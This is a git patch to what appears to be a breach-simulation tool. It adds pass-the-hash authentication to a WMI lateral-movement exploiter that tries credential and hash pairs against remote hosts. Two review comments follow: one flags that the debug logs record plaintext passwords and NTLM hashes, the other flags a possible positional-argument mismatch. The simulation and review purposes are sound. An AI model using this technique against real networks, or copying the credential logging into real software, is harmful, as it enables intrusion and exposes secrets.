From d628a27595909f050bedfced8d6c100693c6051b Mon Sep 17 00:00:00 2001
From: Itay Mizeretz
Date: Wed, 27 Sep 2017 18:30:44 +0300
Subject: [PATCH] Add pass-the-hash for wmi
---
chaos_monkey/exploit/wmiexec.py | 42 ++++++++++++++++++---------------
1 file changed, 23 insertions(+), 19 deletions(-)
diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py
index 15ccb9375..05751f2d5 100644
--- a/chaos_monkey/exploit/wmiexec.py
+++ b/chaos_monkey/exploit/wmiexec.py
@@ -29,34 +29,36 @@ class WmiExploiter(HostExploiter): LOG.info("Can't find suitable monkey executable for host %r", host) return False - user_password_pairs = self._config.get_exploit_user_password_pairs() + creds = self._config.get_exploit_user_password_or_hash_product() - for user, password in user_password_pairs: - LOG.debug("Attempting to connect %r using WMI with password '%s'", - host, password) + for user, password, lm_hash, ntlm_hash in creds: + LOG.debug("Attempting to connect %r using WMI with user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')", + host, user, password, lm_hash, ntlm_hash) wmi_connection = WmiTools.WmiConnection() try: - wmi_connection.connect(host, - user, - password) + wmi_connection.connect(host, user, password, None, lm_hash, ntlm_hash) except AccessDeniedException: - LOG.debug("Failed connecting to %r using WMI with user,password ('%s','%s')", - host, user, password) + LOG.debug("Failed connecting to %r using WMI with " + "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')", + host, user, password, lm_hash, ntlm_hash) continue - except DCERPCException, exc: - report_failed_login(self, host, user, password) - LOG.debug("Failed connecting to %r using WMI with user,password: ('%s','%s')", - host, user, password) + except DCERPCException as exc: + report_failed_login(self, host, user, password, lm_hash, ntlm_hash) + LOG.debug("Failed connecting to %r using WMI with " + "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')", + host, user, password, lm_hash, ntlm_hash) continue - except socket.error, exc: - LOG.debug("Network error in WMI connection to %r with user,password: ('%s','%s') (%s)", - host, user, password, exc) + except socket.error as exc: + LOG.debug("Network error in WMI connection to %r with " + "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')", + host, user, password, lm_hash, ntlm_hash) return False - except Exception, exc: - LOG.debug("Unknown WMI connection error to %r with user,password: ('%s','%s') 
(%s):\n%s", - host, user, password, exc, traceback.format_exc()) + except Exception as exc: + LOG.debug("Unknown WMI connection error to %r with " + "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s') (%s):\n%s", + host, user, password, lm_hash, ntlm_hash, exc, traceback.format_exc()) return False host.learn_credentials(user, password) @@ -77,6 +79,8 @@ class WmiExploiter(HostExploiter): self._config.dropper_target_path, user, password, + lm_hash, + ntlm_hash, self._config.smb_download_timeout) if not remote_full_path:
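Review bot: Every `LOG.debug` call added in the first hunk writes the plaintext password together with the LM and NTLM hashes, and an NT hash is password-equivalent for NTLM authentication, so the debug log becomes a credential store on whatever host the agent runs on. Log the user and the kind of secret tried instead of the secret itself, e.g. `LOG.debug("Attempting to connect %r using WMI as '%s' (%s)", host, user, "hash" if lm_hash or ntlm_hash else "password")`, and apply the same redaction to the four failure messages. Separately, the rewritten `except socket.error as exc:` branch no longer passes `exc` to the logger (the removed message ended in `(%s)`), so the network error detail is lost. The context line `host.learn_credentials(user, password)` still records only the password, which is presumably empty when the hash pair was what authenticated; that is worth confirming. The enclosing method starts and ends outside the hunk.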
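Review bot: In the second hunk `lm_hash` and `ntlm_hash` are inserted positionally between `password` and `self._config.smb_download_timeout`, so the call is only correct if the callee's signature gained the two parameters in exactly that position. The callee and its other callers are not visible in this diff; a caller left on the old argument order would pass its timeout where a hash is expected without raising an error. If the callee accepts keywords, passing the new values and the timeout by name (`lm_hash=lm_hash, ntlm_hash=ntlm_hash,` with the parameter names assumed here) keeps the call unambiguous. The call begins outside the hunk.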